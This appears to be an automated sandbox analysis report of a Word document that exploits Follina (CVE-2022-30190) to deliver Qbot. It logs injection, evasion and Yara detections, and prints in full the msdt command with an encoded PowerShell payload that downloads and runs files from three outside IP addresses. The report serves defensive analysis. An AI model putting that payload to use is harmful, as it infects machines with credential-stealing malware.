                            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5332Thread sleep count: 120 > 30
                            Source: C:\Windows\SysWOW64\explorer.exe TID: 2212Thread sleep count: 66 > 30
                            Source: C:\Windows\SysWOW64\explorer.exe TID: 5996Thread sleep count: 49 > 30
                            Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                            Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 1365
                            Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                            Source: C:\Windows\SysWOW64\explorer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformation
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499DD62 GetSystemInfo,
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499BCFC FindFirstFileW,FindNextFileW,
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042ABCFC FindFirstFileW,FindNextFileW,
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AFBCFC FindFirstFileW,FindNextFileW,
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 32_2_02F8BCFC FindFirstFileW,FindNextFileW,
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499EEBB LoadLibraryA,GetProcAddress,
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory protected: page write copy | page execute and write copy | page guard

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Maps a DLL or memory area into another process
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
                            Writes to foreign memory regions
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 2FB0000
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 90F380
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 2E90000
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 90F380
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 2EF0000
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 90F380
                            Allocates memory in foreign processes
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 2FB0000 protect: page read and write
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 2E90000 protect: page read and write
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 2EF0000 protect: page read and write
                            Injects code into the Windows Explorer (explorer.exe)
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 4384 base: 2FB0000 value: 9C
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 4384 base: 90F380 value: E9
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2256 base: 2E90000 value: 9C
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2256 base: 90F380 value: E9
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5492 base: 2EF0000 value: 9C
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5492 base: 90F380 value: E9
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2969.tmp" "c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4732.tmp" "c:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP"
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B1C.tmp" "c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP"
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
                            Source: C:\Windows\SysWOW64\msdt.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499A065 GetSystemTimeAsFileTime,
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499DF3D GetCurrentProcessId,LookupAccountSidW,GetLastError,GetSystemMetrics,GetVersionExA,GetWindowsDirectoryW,
                            Source: regsvr32.exe, 0000001B.00000003.657889439.0000000004BDF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.660022183.00000000048EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.666902893.0000000004C2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
                            Source: regsvr32.exe, 0000001B.00000003.657889439.0000000004BDF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.660022183.00000000048EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.666902893.0000000004C2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsserv.exe
                            Source: regsvr32.exe, 0000001B.00000003.657889439.0000000004BDF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.660022183.00000000048EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.666902893.0000000004C2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
                            Source: regsvr32.exe, 0000001B.00000003.657889439.0000000004BDF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.660022183.00000000048EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.666902893.0000000004C2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgcsrvx.exe
                            Source: regsvr32.exe, 0000001B.00000003.657889439.0000000004BDF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.660022183.00000000048EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.666902893.0000000004C2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcshield.exe
                            Source: regsvr32.exe, 0000001B.00000003.657889439.0000000004BDF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.660022183.00000000048EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.666902893.0000000004C2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Qbot
                            Source: Yara matchFile source: 27.2.regsvr32.exe.4990000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.43f0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.regsvr32.exe.4ad0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.43c0184.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.810184.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.43f0000.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.regsvr32.exe.4ad0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 33.2.explorer.exe.2e60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.regsvr32.exe.4aa0184.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.2.explorer.exe.2ec0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 32.0.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.regsvr32.exe.4af0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.2.explorer.exe.2ec0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.4280000.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.regsvr32.exe.4af0000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 32.2.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 32.2.explorer.exe.2f80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 33.0.explorer.exe.2e60000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.0.explorer.exe.2ec0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 33.0.explorer.exe.2e60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.42a0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.regsvr32.exe.4aa0184.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.4280000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 33.2.explorer.exe.2e60000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.42a0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.0.explorer.exe.2ec0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.43c0184.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.4990000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.810184.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 32.0.explorer.exe.2f80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000001B.00000002.672940732.00000000043F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000021.00000002.710753771.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000020.00000000.671132506.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000021.00000000.671727955.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.672803650.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.673012355.0000000004280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000022.00000002.679063028.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000022.00000000.675088728.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001D.00000002.677339037.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Yara detected CryptOne packer
                            Source: Yara matchFile source: 0000001B.00000002.672803650.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                            Remote Access Functionality

                            barindex
                            Yara detected Qbot
                            Source: Yara matchFile source: 27.2.regsvr32.exe.4990000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.43f0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.regsvr32.exe.4ad0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.43c0184.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.810184.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.43f0000.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.regsvr32.exe.4ad0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 33.2.explorer.exe.2e60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.regsvr32.exe.4aa0184.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.2.explorer.exe.2ec0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 32.0.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.regsvr32.exe.4af0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.2.explorer.exe.2ec0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.4280000.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.regsvr32.exe.4af0000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 32.2.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 32.2.explorer.exe.2f80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 33.0.explorer.exe.2e60000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.0.explorer.exe.2ec0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 33.0.explorer.exe.2e60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.42a0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.regsvr32.exe.4aa0184.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.4280000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 33.2.explorer.exe.2e60000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.42a0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.0.explorer.exe.2ec0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.43c0184.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.4990000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.810184.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 32.0.explorer.exe.2f80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000001B.00000002.672940732.00000000043F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000021.00000002.710753771.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000020.00000000.671132506.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000021.00000000.671727955.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.672803650.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.673012355.0000000004280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000022.00000002.679063028.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000022.00000000.675088728.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001D.00000002.677339037.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Yara detected CryptOne packer
                            Source: Yara matchFile source: 0000001B.00000002.672803650.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                            Mitre Att&ck Matrix

                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid Accounts1
                            Command and Scripting Interpreter                            		1
                            Scheduled Task/Job                            		411
                            Process Injection                            		11
                            Masquerading                            		1
                            Credential API Hooking                            		1
                            System Time Discovery                            		Remote Services1
                            Credential API Hooking                            		Exfiltration Over Other Network Medium1
                            Encrypted Channel                            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                            Default Accounts1
                            Scheduled Task/Job                            		1
                            DLL Side-Loading                            		1
                            Scheduled Task/Job                            		1
                            Virtualization/Sandbox Evasion                            		LSASS Memory1
                            Query Registry                            		Remote Desktop Protocol1
                            Archive Collected Data                            		Exfiltration Over Bluetooth11
                            Ingress Tool Transfer                            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain Accounts3
                            Native API                            		Logon Script (Windows)1
                            DLL Side-Loading                            		1
                            Disable or Modify Tools                            		Security Account Manager11
                            Security Software Discovery                            		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                            Non-Application Layer Protocol                            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local Accounts12
                            Exploitation for Client Execution                            		Logon Script (Mac)Logon Script (Mac)411
                            Process Injection                            		NTDS1
                            Virtualization/Sandbox Evasion                            		Distributed Component Object ModelInput CaptureScheduled Transfer21
                            Application Layer Protocol                            		SIM Card SwapCarrier Billing Fraud
                            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                            Obfuscated Files or Information                            		LSA Secrets2
                            Process Discovery                            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable MediaLaunchdRc.commonRc.common1
                            DLL Side-Loading                            		Cached Domain Credentials1
                            Application Window Discovery                            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                            Remote System Discovery                            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem3
                            File and Directory Discovery                            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow16
                            System Information Discovery                            		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 signatures2 2 Behavior Graph ID: 640940 Sample: doc782.docx Startdate: 07/06/2022 Architecture: WINDOWS Score: 100 55 Snort IDS alert for network traffic 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 Yara detected Microsoft Office Exploit Follina CVE-2022-30190 2->59 61 6 other signatures 2->61 8 regsvr32.exe 2->8         started        11 regsvr32.exe 2->11         started        13 regsvr32.exe 2->13         started        15 5 other processes 2->15 process3 dnsIp4 65 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 8->65 67 Injects code into the Windows Explorer (explorer.exe) 8->67 69 Writes to foreign memory regions 8->69 19 explorer.exe 8->19         started        71 Allocates memory in foreign processes 11->71 73 Maps a DLL or memory area into another process 11->73 22 explorer.exe 8 1 11->22         started        24 explorer.exe 13->24         started        51 185.234.247.119, 49744, 49763, 49865 INTERKONEKT-ASPL Russian Federation 15->51 53 192.168.2.1 unknown unknown 15->53 39 C:\Users\user\Desktop\~$doc782.docx, data 15->39 dropped 41 C:\Users\user\AppData\Local\...\123[1].RES, HTML 15->41 dropped 43 C:\Users\user\AppData\Local\...\89DF4BAA.htm, HTML 15->43 dropped 45 4 other files (1 malicious) 15->45 dropped 26 msdt.exe 21 15->26         started        29 cvtres.exe 1 15->29         started        31 cvtres.exe 1 15->31         started        33 4 other processes 15->33 file5 signatures6 process7 file8 63 Uses schtasks.exe or at.exe to add and modify task schedules 19->63 35 schtasks.exe 22->35         started        47 C:\Windows\Temp\...\DiagPackage.dll.mui, PE32 26->47 dropped 49 C:\Windows\Temp\...\DiagPackage.dll, PE32+ 26->49 dropped signatures9 process10 process11 37 conhost.exe 35->37         started       

                            Screenshots

                            Thumbnails

